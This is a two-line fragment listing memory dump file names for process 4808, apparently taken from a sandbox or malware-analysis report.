memory/4808-329-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

memory/4808-330-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp